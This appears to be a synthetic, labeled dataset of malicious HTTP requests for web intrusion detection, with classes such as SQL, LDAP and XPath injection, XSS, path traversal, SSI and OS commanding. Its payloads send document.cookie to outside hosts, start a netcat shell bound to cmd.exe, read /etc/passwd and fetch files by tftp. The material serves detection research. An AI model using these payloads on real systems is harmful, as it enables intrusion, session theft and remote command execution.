Max-Forwards: 2
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic YWtFd25wOmtoYW8=
Authorization: Digest qop=auth
Range: 67-764741,470518-20,3-202913
Referer: http://q6adade.com/eiyneos/ddwu.txt
TE: trailers,deflate
Trailer: Authorization
User-Agent: jeerbaitlhjPn
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 695x429
Via: FTP/1.1 133.226.155.4, 7.6 www.ueef.css:76
Transfer-Encoding: nraOo
Upgrade: Eaxve/8.7, yk0s/2.8
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44038
Start - Id: 48835
class: XPathInjection
GET /tTsIh2eta/rl@ggAdNf/WPx6DgN2boot.iniQ.gif?catnrr84z=dd0euPUQ6X&ao0d=0067597052&rx=18rtiuotW&ca0aserhdessz=eaVc%27%5D+%7C+++++P+++++%7C++++%2F%2Fuser%5B+++name%2Ftext%28++++%29%3D%27sewo HTTP/1.0
Host: www.lcghs9ceoy.be:39
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-turkish, x-mac-ce;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 35.113.99.20
Cookie: 6lanoEgce5tee=ocinullt;liu7=%;mwo=Lm
Cookie2: $Version="84"
Date: Wed, 10 Mar 04 12:56:51 UTC
ETag: W/"JftVl8GYxSRSP6hMl"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Fri, 21 Nov 08 06:18:53 GMT
If-Unmodified-Since: Mon, 09 Aug 04 10:37:43 UTC
If-Match: *
If-None-Match: "kqe6Ap2y9mKJ-3MR"
If-Range: "a94BlaFi9D5pQ4_"
Max-Forwards: 6
MIME-Version: 9.5
Pragma: ezgGepae='Dpjhgsl'
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: NTLM ZWRUNXNpbzJ0amVzc2RrT3llcmU5bFNvaXRuZVNhZU5lb3RiTWFpZ2ZidGJ0ZQ==
Range: -970304,-74
Referer: http://Ne2nikz.org/eoe8.msf
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 1.0; tb-oi; rv:9.4.1) Gecko/44128641
UA-CPU: StrongARM
UA-Disp: 5906,9544,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: n34t/6.4 99.152.253.81
Transfer-Encoding: gzip
Upgrade: qdiue/5.0
Warning: 056 www.f4xe1oNm.htm "ehiaia" "Mon, 17 Nov 08 12:21:14 CET"
X-Forwarded-For: 54.250.164.51
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48835
Start - Id: 42095
class: SqlInjection
GET /aAaelgmxSoaTOcdld/2yeyds0ahzthh9/2OsWY/lg/QV-dxWK.KX/Ic/EilaEtcaal/mRxV.Cy5/dfFemcbFlink-UBhU/HnoKfqoee7i/oA-g2B1hDv8c7IgU.jsp?vtNnfsbundlyhtv=5636448&QjIcatSbyhttpsSinputhE=dQg4r&rclf4dt=qwer%27++or++5j_v.Account%3D%27ncotiiyy%40anirlt.com HTTP/1.1
Host: 130.85.102.60:5826
Connection: close
Accept: */*
Accept-Charset: windows-874
Accept-Encoding: deflate, deflate
Accept-Language: *;q=0.2
Cache-Control: min-fresh=46
Client-ip: 198.157.61.69
Cookie: GNZYv=niijtxhhttpieo2lruds8u;lgYxFGnph-DyIbM=aCcaCLWSw;srjO=965260
Cookie2: $Version="6"
Date: Tue, 27 Apr 10 14:06:43 UTC
ETag: "ducLTVBou0lyuo32LMT"
Expect: bu7dtjr
From: LzmxnseS@evezd.fr
If-Modified-Since: Mon, 05 Jun 06 19:11:22 UTC
If-Unmodified-Since: Fri, 02 Nov 07 22:48:49 CET
If-Match: *
If-None-Match: "ou0YwSWz9LPv0Awbi"
If-Range: Sun, 25 Oct 09 10:38:31 UTC
Max-Forwards: 5612
MIME-Version: 0.9
Pragma: hnqnezor=1Pee
Proxy-Authorization: NTLM ZWRsQmkwaXFyaW4yZXpoaGVSNTdyb2llRXRpYXRlbmk4cmRhaWM=
Authorization: Digest qop=auth-int
Range: 106-1944,67279-,2-
Referer: http://eeNlat.cz/caepc.asmx
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.2 (Windows; U; Win98 7.1; Qd-ee; rv:9.2.0) Gecko/56166128
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 9.6 www.zn9s.gif:7362
Transfer-Encoding: compress
Upgrade: axh/8.9, sit/8.6, rcc/1.0, ite/1.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42095
Start - Id: 42997
class: OsCommanding
POST /tkzBl/mWON/SvarvVy.acDautoexechomex/mosjdrnhdaitaibi/select38qxU/3uinU81w7ivcdphw/TstdinEG/4D%u/7JpJXDh2YS92rT.png? HTTP/1.1
Content-Length: 302
Content-Language: iOkrtAh,ESw,i
Content-Encoding: compress
Content-MD5: N2MzdXVuYWxhZW5xb3JsZQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 25 Jan 05 03:34:32 UTC
Host: 9.25.248.33
Connection: keep-alive
Accept: application/*;q=0.1
Accept-Charset: x-mac-japanese;q=0.0, windows-1250;q=0.6, shift_jis, x-mac-icelandic
Accept-Encoding: *
Accept-Language: 2moet0-aloT, lg-tOhh;q=0.2, la6nbise-hpaidt;q=0.5
Cache-Control: only-if-cached
Date: Fri, 29 Oct 04 08:01:03 UTC
If-Modified-Since: Sun, 11 Jul 04 19:02:41 CET
If-None-Match: *
Referer: http://www.g4tih.de/0nairebi/oioer/Eor1Yelh/nnc1s/ectlz.mdb
User-Agent: Mozilla/3.0 (X11; U; Open BSD i586 5.1; gt-sx; rv:5.1.6) Gecko/96755214
Warning: 661 218.41.109.182 "etat9dhap3oaGlsrt" "Tue, 27 Jan 09 24:39:33 UTC"
X-Forwarded-For: 13.179.110.19

Lxcb9k.N=n&uw=reguso&dONeunbjfnh4Esn=v97Yb&8e=seMo9oro1&afrstftQ= romrIa lm77i&5jbthH=67985981&fGtm033sahbIgey=cat   /etc/passwd |&irSn9xtitptnso=zac1ItItd&moggieg49idaw=t((&aeTocirns9rya=53429&f3arehrybge=wget~a&metsw6potiant9=52176&zkvtonx4ie0=openyo+E&zmochaETlog=3761660&5dSe8=5972797

End - Id: 42997
Start - Id: 47347
class: XSS
GET /nhZ/lnayv62-vxwV/ufuWw6eeqaaeileheNi/cihpa/9chakrhtectcetre5k/os.MZJ1BFwAf/6basihfhaaoieeora/Srntgswineohewgeo.shtml?5na4ltno=so-i&uyyoeie=r+nndg2lanl+linkmtt&ceblsUg=8627365&d6=h&paHdtnee5=5928878&ha8yaTyizl0ab=bdomb&eM8Opt=Is+r&eSartnkhZ=oR5h5tsrh1hy4z&eosEcea=22840&mnobenes=%3Cobject+++classid+++%3D+%22+clsid%3A...++++%22+++++codebase++++%3D%22javascript%3A+%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.altanast.com%2Fcgi-bin%2Fenneic.cgi%27%2Bdocument.cookie%29%3B%5D+++%22++%3E&vc=041341264 HTTP/1.1
Host: www.ris2tl.fr
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 78.22.181.142
Cookie: neofs5arimtno=lsanybtsjeth;tsemimz=u5Naat]de8ehwfw[;x0F.S=sf(ni[;ijertnqARdxa=eydteNvpotr;ahlne=[wig
Cookie2: $Version="38"
Date: Mon, 13 Nov 06 05:18:45 CET
ETag: W/"hFEpGMyZ@tmbqYv"
Expect: 100-continue
From: d8Pnt@fyea.com
If-Modified-Since: Wed, 11 Nov 09 08:16:46 CET
If-Unmodified-Since: Thu, 04 Oct 07 14:44:48 CET
If-Match: "41N7uVb2xOKs1TsdNMMt"
If-None-Match: *
If-Range: Tue, 07 Oct 08 11:00:36 CET
Max-Forwards: 47
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: NTLM V25oQTYxZmE5bmQwb29vcDNRb3Juc3lvbGFkSXloNGk=
Range: -066761,152-
Referer: /arteHah/rthee/euReDar/Aoad.tar
TE: trailers,trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/5.3 (Windows; U; WinNT 0.0; vr-E1; rv:9.5.5) Gecko/33747216
UA-CPU: x86
UA-Disp: 699,6656,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 575x5791
Via: oe6/8.5 54.186.219.133:73286, 7.8 32.224.78.106
Transfer-Encoding: identity
Upgrade: ni4st/4.0, 7issa/1.3
Warning: 030 32.43.121.212 "zsmp" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47347
Start - Id: 37567
class: LdapInjection
POST /om20/FlslinkPvtFqINQw/cvLqn6/wn9jbvR/yiIJVUh2aVJ7xJ5Zo/_@IyrtmporIbacceptBL.0/aaTzLE._Xlhrbe/dseaItese/nity44.jpg? HTTP/1.1
Content-Length: 320
Content-Language: nbomgre,2alekw,leAwt
Content-Encoding: identity
Content-Location: /nnulx/mLui/scytAae/3jtoitsi/auae.nsf
Content-MD5: cnlObnQxZUZOeXJudElvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 May 08 16:18:50 CET
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: 216.25.144.242
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, identity;q=0.5, gzip, gzip, deflate
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 204.9.113.47
Cookie: M6iAvsesy2rsh3=e;ie3oahc=tonnuahlazsystemSm5;yaofig4r=g1Eh_AbqpFy;open_AWjrin=dMdptminifDtap08;Snz8smbm=091
Cookie2: $Version="03"
Date: Fri, 01 Jul 05 02:01:01 CET
ETag: W/"opjc3ToLOFC@rsjI2Os"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sun, 13 Jun 04 02:37:47 CET
If-Unmodified-Since: Tue, 02 Nov 04 05:12:08 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Mon, 16 May 05 05:58:40 GMT
Max-Forwards: 526
MIME-Version: 8.8
Pragma: cRrro=slgpp
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: NTLM aWVubmxHb3JldmZSZ2lsMWlhTmhDbHNxaGk3ZGhhb0R1b2lvTDh4dnNjTk1lWW90
Range: -74,-46159,08-370587
Referer: /8tsrct/otssde.dll
TE: deflate,chunked;q=0.5,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.2 (compatible; MSIE 1.8; Open BSD i586; ieefkabo; rwoH; cecuIoiss)
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 299x8794
Via: 8.6 www.p7de4.jpg, 2.0 171.145.210.220, 5.8 3.142.47.220
Transfer-Encoding: deflate
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 01594707388200191754
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lhree5lon0emh=4577520340&aofh=59534&elOaaen=)  (  |   (    cn=*o  'brien* )(mail    =*o    'brien* )   &ryonpA=5173183&eaWohteVrlao=(Anyrimhetqhifwr&J.styleMN_2X=%a0&lRp=nLrtr2CPI9n3&UhDF=io&aIN08Tpjy=seedrrehn0A8&umrhsSt4h=734&kNOsTn9F=7453&9pOfvmp=4&lMoyehd5t=6Hmlehe=&HC_D=7467&nh0gEp=osrr

End - Id: 37567
Start - Id: 42839
class: OsCommanding
GET /fEtwahuesdx/grrsne/.Uwp-.php3?oibryttylclsnc=4roemhaseer&zto=%7C++++dir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C%2C&ttanrevMio=e%5Co&4hwrbsn2tugy=eposfinmueeth9ter&Ttxterm@=7707531 HTTP/1.0
Host: www.wcoi20.biz:80
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=871
Client-ip: 141.50.68.204
Cookie: rpselaPn=57373556
Date: Fri, 07 Oct 05 01:57:38 UTC
ETag: W/"ef0WQgxn5Q51Zfuc1"
Expect: 100-continue
From: otsveiea@oarDol.com
If-Modified-Since: Wed, 11 Mar 09 24:33:52 CET
If-Unmodified-Since: Thu, 26 Feb 04 22:06:48 UTC
If-Match: "gENoWcr5j_zjOQ1c-Rd"
If-None-Match: "HIPYvh7vahUrQiS@ml"
If-Range: Tue, 04 Jul 06 23:08:47 CET
Max-Forwards: 8745
MIME-Version: 7.9
Pragma: EsNriea='9S'
Authorization: 8w6nte apoS8=aisrnil5
Range: -885,-18051
Referer: /anMhirht/fmrae/seeaLdoy.nsf
TE: trailers,chunked
Trailer: Host
User-Agent: Mozilla/1.9 (X11; U; Solaris 7.2; lw-yG; rv:6.2.3) Gecko/61795215
UA-CPU: StrongARM
UA-Disp: 1330,7116,16
UA-Color: color32
Via: 0.7 212.160.95.7:2087, FTP/1.3 229.192.98.243, 9.7 www.rn4b.html
Transfer-Encoding: identity
Upgrade: NhTeWO/2.9, teisee/0.9
Warning: 697 www.atUa.htm "itafi4b9c" 
X-Forwarded-For: 209.98.157.41
----: -------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42839
Start - Id: 36652
class: OsCommanding
GET /uP6/vGB.exe?-httpsMJYD5=64&.Bnq=pKJA9&cnswStmiss7sox=mtKDPLx91cV&TenRwthoeMnmSn=%7C++dir+++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++%2C&4oFrpcr=eobjecteeb&AaJ0hVandtchildaRV=w%5Ce HTTP/1.1
Host: 42.204.194.18
Connection: close
Accept: */*;q=0.9
Accept-Charset: euc-cn;q=0.6, x-mac-icelandic
Accept-Encoding: gzip, gzip;q=0.7, identity, deflate
Accept-Language: iqroote-olIdabiE
Cache-Control: max-stale
Client-ip: 237.53.232.194
Cookie: tctfnypcjgre=5378091;laeAerfdpiohl=rh
Date: Tue, 31 Oct 06 14:55:03 CET
Expect: foAfel
From: zeiTo@a5ng.biz
If-Modified-Since: Sun, 25 Dec 05 01:41:44 UTC
If-Unmodified-Since: Mon, 29 May 06 12:21:58 CET
If-Match: "JFrPRg6DZ2Zw4CwlymH"
If-None-Match: "2cdUO98hyQW3@xV"
If-Range: *
Max-Forwards: 5
MIME-Version: 8.5
Authorization: knwa2 hhrais7=2pEA
Referer: /eeet/3ojdAd4t/tsy03i/nrreaHH.php3
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.5 (Machintosh; U; PPC 2.9; jo-en; rv:4.8.8) Gecko/67145027
UA-CPU: Sparc
UA-OS: Linux
Via: rost5/2.2 123.53.16.166, FTP/8.9 www.tnsas.tiff
Transfer-Encoding: gzip
Upgrade: hirt/7.6, istgh/5.6, szyxei/3.3, aaas/9.3, pd3/0.4
X-Forwarded-For: 193.167.35.201
X-Serial-Number: 96597
----: -----------------

null

End - Id: 36652
Start - Id: 44956
class: PathTransversal
GET /rltTn9jtea/a5mKs@@Jl7JFo/aKtTRGdnw/rCnuD-mVj0Qd/ofTy/akkh8kzZ236t/e7.css?267tbdnilonae=Wt%3Cchild&o0ieoltnMe=237671&t_FD-qWH2suprocessing-instruction=0482&Xuwgpv=27&7SalZ=292897&yeea7i3eiNeao=6d&5kaiCn4dgenf=doc%28++file%3A%2F%2F%2Fc%3A%2FtInx%2Feodci.xml+%29&jtlatn=88417195&yoBAaunto=rjetb%3Ajb%2Bnetcatoy&fwsd9Hmt=3&isrWmcwi=osEauuiau&nai=%5Croleroe+163s5%3DoAcmdk&tjlenhozFgbEnwr=50739 HTTP/1.0
Host: www.ote9im.uk
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: identity, compress;q=0.8
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 132.242.52.39
Cookie: H5f5Mqvcats=jxiRtmu;abwmfdtsout9eoT=mI+r
Cookie2: $Version="66"
Date: Fri, 07 Nov 08 16:37:50 CET
ETag: W/"aALg1_G.AL9vGMm"
Expect: omotegt
If-Modified-Since: Thu, 29 Sep 05 11:41:28 UTC
If-Unmodified-Since: Sun, 30 Jan 05 12:40:37 CET
If-Match: "7DZNf81oAYIfxPIXFaN"
If-None-Match: *
If-Range: Fri, 30 Dec 05 21:42:53 CET
Max-Forwards: 9714
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM ZWhkeDZyMW1hQTFyZGROZm5pdnNTZWx0cnRlb293b2FydkR1OXQ=
Authorization: Digest nonce
Range: 692467-8,088341-5,956298-14
Referer: /eldayt.exe
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.0 (Machintosh; U; PPC 2.4; Or-di; rv:2.6.2) Gecko/70243131
UA-CPU: Sparc
UA-Color: color16
UA-Pixels: 298x509
Via: dSS/5.0 184.217.61.230:0321
Transfer-Encoding: identity
Upgrade: nsi/5.0
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Serial-Number: 9376895954650597
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44956
Start - Id: 47795
class: XSS
GET /oolSa_5kLakV/hiDmrfbknmDVl/i49aesro3cfhb3at7rf/oqZb/epaEcoreae5ieniyu/J8k@49include6dyZ14JZ/jPZ-5/hleuxitg/iv7iaoal4aesaedy5e/iygus4/HOydotatjrtdaeremhr/8B7bgfr1E.php4?suO=4921309&sttie=7tnreplaceoe&emeb06=aPj&pjucyesltl=wp-ljpiyetc3ihrr%3Dst5i&Nd=aZD.0MvhrVG&9Onlojnnsnch2t=%3Clink+rel%3D++%22+++++stylesheet++%22+++href++++%3D++%22+javascript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.geelsira.com%2Fcgi-bin%2Ftage.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+++%3E&r3nu=9428 HTTP/1.0
Host: 55.41.89.94
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 19.80.216.59
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="10"
Date: Wed, 14 Oct 09 17:44:57 GMT
ETag: W/"0gwgQpp6mZtSr2.Zvl"
Expect: r9yiSe1r=lsznS
From: dRkiaeue@o6si.cz
If-Modified-Since: Sat, 03 Nov 07 16:38:44 CET
If-Unmodified-Since: Mon, 17 Jan 05 07:53:36 UTC
If-Match: *
If-None-Match: "0QiSEmup8eShnWI@g.eh"
If-Range: Fri, 17 Aug 07 10:37:17 CET
Max-Forwards: 2160
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: Basic ZWRTMTp2VzJveWU=
Range: 56-,617417-
Referer: /ahanhp49.php3
TE: deflate,deflate;q=0.9,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.8 (X11; U; Solaris 4.7; Bo-5r; rv:1.8.2) Gecko/98421922
UA-CPU: x86
UA-Disp: 0252,4882,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 876x886
Via: 3.7 57.239.25.118
Transfer-Encoding: compress
Upgrade: cOeQ/0.4, boyed/0.6, stEhr/6.5, lfqeh/2.9
Warning: 348 www.lhsep.png "gefrthtkaanhwheldAc" "Sat, 20 Mar 10 09:17:23 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 14491
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47795
Start - Id: 40267
class: SSI
GET /eEyto4lscfiha9nwe/jo_/stoh/erniebZhc/75Q-Sscriptl5S-/td5JWa/orP1vf/etcp1asnlntt/nnuc.php4?MZvDc9=%3C%21--++%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5Ci1gtwNSarA%5Cii3lM%5Cl2wsfdr.exe++d%3A%5CMNnelnd%5Cwww.rode.org%5Cirdo1eSHfu%5Cdatabase.mdb+++++%2Fx+++exporttofoxpro%22--%3E&qjSo7jor=++&sdErhwnga4catay=061978296&eGh.Evq_gg3var=%26mshtaDhti&eeHdxsapnlhr=147458248&nmmm=87 HTTP/1.0
Host: 155.174.14.13
Connection: nDav
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: etra-Aath;q=0.2, a-1minem;q=0.7, rrilbiS-olaZi;q=0.0, aau-lrroi
Cache-Control: no-transform
Client-ip: 140.72.125.191
Cookie: vupasja3ema8=slmE;TUxr4N9union=3998296;hrv3sf5oo=0390;trtiearI1gau=7;1nh8e=oN8'cydi;irdBWeMry7=11
Cookie2: $Version="14"
Date: Wed, 07 Jul 04 17:33:46 CET
ETag: W/"8XJ3NacQ1B7dNW_J182z"
Expect: 100-continue
From: egziMn7g@s6edmgn.st
If-Modified-Since: Tue, 16 Dec 08 14:30:43 CET
If-Unmodified-Since: Thu, 21 Jun 07 10:39:49 CET
If-Match: "rSCGOwXFNPvP-sEum"
If-None-Match: "al9Ci8aqrUkjFeBH"
If-Range: "atnOO.VOMeoQPML2"
Max-Forwards: 722
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/A2lAseE/fmtkprd/sito/xrIox8.avi
Authorization: Basic ZUVhcjpPdHFjb2xlcg==
Range: 1030-
Referer: http://www.zldrc.biz/eIeLsdpm/rOmu/Oisodrh.mspx
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/0.1 (Machintosh; U; PPC 7.7; t7-zu; rv:0.0.9) Gecko/53329311
UA-CPU: MIPS
UA-OS: Win95
Via: 9.3 www.rx5met.html, HTTP/3.8 www.aemah.css
Transfer-Encoding: rapc52
Upgrade: zebo/3.9
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40267
Start - Id: 42882
class: OsCommanding
GET /c.AsOWAqFWIoWZf1c0/nq-4yQohh/oyreter57/n.vt@f9A@iVvGPL/tQHVsk.exe?-m9hM=Ur2nnftk&FmA8hSh=lSr+0&mbro=%27Prmq%3ARte4jil7cu&u72ocEiye=%7Cshell%28++%22cmd++%2Fc++++c%3AInetpubwwwrootMSISSnc.exe++-l++++-p+2129+++++-t+++-e+++++cmd.exe++++%22++++%29+++%7C++%27&3formztEKU=n%7E&pephSyl=6414285&O3OG=323&9llg2wEDeeismh=%3F&mdlcidpaote4=onBmtpjRe&7V2RF=9094&rc9p8tcErhc=6 HTTP/1.0
Host: www.adhn.gov
Connection: keep-alive
Accept: application/*;q=0.1, video/mpeg;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: oas-nrnlete, hA0uc-i
Cache-Control: only-if-cached
Client-ip: 241.68.47.162
Cookie: tottqrih0ceNcie=081784;rrdgo6c=fP5Is;o0ctegtpo=rfsi;lma422losSotrr2=tZC4S.PzH8iM
Cookie2: $Version="443"
Date: Fri, 26 May 06 06:53:43 UTC
ETag: "mC@rd8lAtMiE6hU-B"
Expect: 100-continue
From: n2zse0bo@tibsA.uk
If-Modified-Since: Sat, 13 Jun 09 14:38:46 CET
If-Unmodified-Since: Sat, 28 Nov 09 19:04:30 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Dec 07 07:14:12 GMT
Max-Forwards: 72
MIME-Version: 6.8
Pragma: gaNta=ssyssn
Proxy-Authorization: Basic cm5lOWVzaUk6ZWRvZWE=
Authorization: Digest realm
Referer: /mones/rtbrrt6g/4tre/dasajt/mlna.js
TE: trailers,deflate;q=0.0
Trailer: Upgrade
User-Agent: fosrjothwi/3.0.6.9
UA-OS: Win98
UA-Pixels: 4835x5695
Via: HTTP/2.9 www.nadel.tiff, 6.9 155.196.119.58:4, 6.0 48.133.224.102
Transfer-Encoding: hstcR; aenausut=sttkd
Upgrade: llre/7.7, ldlseg/5.7
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 24256159613993344
----: ------------------------------------------------

null

End - Id: 42882
Start - Id: 36882
class: LdapInjection
GET /evr5jbeybseee/ee2pbredne6hod/5mcp7hio5iei.asmx?hf=Tira57as4Gmj&bnhnenSapgegat=eCrd&kJ7Xhwindow.open0nUzI=5er&sceeaol=boot.inismtztl5eo&x7qn9lleoele=110382878 HTTP/1.0
Host: 186.70.121.183
Connection: 2HhhnAtD
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.0
Cookie: hrsozpbehtttsS=7849)(&(objectClass=nfy)(|(sn   =  8sSd)(cn=rgE J*))
Date: Wed, 24 Mar 10 24:58:51 CET
ETag: W/"4k.vyB1_@hulJ88.ffGO"
From: god7on@cdae.de
If-Range: Thu, 11 Aug 05 10:06:17 GMT
Max-Forwards: 62
Pragma: no-cache
Referer: http://www.rtft.net/aceal.php4
TE: deflate;q=0.4
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 4.5; qs-3p; rv:0.5.4) Gecko/42043892

null

End - Id: 36882
Start - Id: 46138
class: PathTransversal
GET /rgTI6/oT_tC/wnlStcan/Ch.GvAo@y89V/pL64/nr2D0Gv@j6X.htm?aeelotaitqnnhid=74604980&ies=be&vtO1=objectwncDposition%3Ca&uhNnzdsrnxe=ead&Hme=nwptd&shtrltcpldfi=Easy9o%29thl&jodfno9=azorlrnmerjt&aq-TorT06X2meta=uiMeDoD4f1&RTW@5_x8CVJ=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.0
Host: 234.58.31.3
Connection: keep-alive
Accept: text/*;q=0.1
Accept-Charset: *
Accept-Encoding: compress;q=0.9, compress, compress;q=0.1, identity;q=0.2
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 136.234.111.217
Cookie: e9ehesdmAd=edse;taeLwnean=cmid;1oae3ioiyxTtd=35;8-QHselectS0x1P=odnsu4ne
Cookie2: $Version="5"
Date: Tue, 02 Jan 07 04:03:32 UTC
ETag: W/"@gclfMBVckCyYv5PiJh"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Thu, 03 Jan 08 15:10:33 GMT
If-Unmodified-Since: Fri, 24 Aug 07 15:01:47 CET
If-Match: *
If-None-Match: "UZfRrMcX6zPB_Ha3Patl"
If-Range: "xzHNhNQSzT8916zpG3r"
Max-Forwards: 4853
MIME-Version: 0.5
Pragma: iu=t
Proxy-Authorization: NTLM ZmtlMG53bm9pc3N0cDR1aWlhbmF2b2FkaGM1aW5ldGhk
Authorization: NTLM ZWFhZW5lU1hlZ0huYWU3Y1Fhbmllb25uZXM3bnRycExSdHJzd2VyN3M=
Referer: http://www.fars3ri.gov/eoca.css
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.0 (X11; U; Solaris 3.4; st-dr; rv:2.6.2) Gecko/46247101
UA-OS: Windows NT
Via: FTP/4.0 www.ecAtd3i.jpeg, FTP/4.2 28.0.88.178
Transfer-Encoding: compress
Upgrade: 4sr0z/5.8, 5eIsba/5.8, lviujp/4.0, arJ2h/2.1, fgge/2.5
X-Serial-Number: 83931
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46138
Start - Id: 43193
class: OsCommanding
GET /coustda6.gif?dh9jtakAnoit7w=387120650&OAly=57098&2nihiz2han9chc=%5Cn+uftp+-p++++www.natr.com+%2Ftovend%2Folilro%2Frechtr%2Fitto%2Fanelan%2Fns HTTP/1.1
Host: 53.96.44.131
Connection: keep-alive
Accept: image/*, image/jpeg;q=0.0, image/*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-age=2
Client-ip: 200.51.152.246
Cookie: cnhIewqOcelhzoa=a k8-;XdrzS@Gfmailst-=zxQBIP
Cookie2: $Version="045"
Date: Sat, 20 Feb 10 10:44:46 GMT
ETag: "suT-V8TEaGf@1y8c"
Expect: eee7arsi=fomn;adnogm=imetlca
From: dsmHrei2@sentDlSn.biz
If-Modified-Since: Sat, 10 Sep 05 23:48:37 UTC
If-Unmodified-Since: Sun, 25 Apr 04 08:46:52 UTC
If-Match: *
If-None-Match: "cw5L3pYnaTmQVZe@lj"
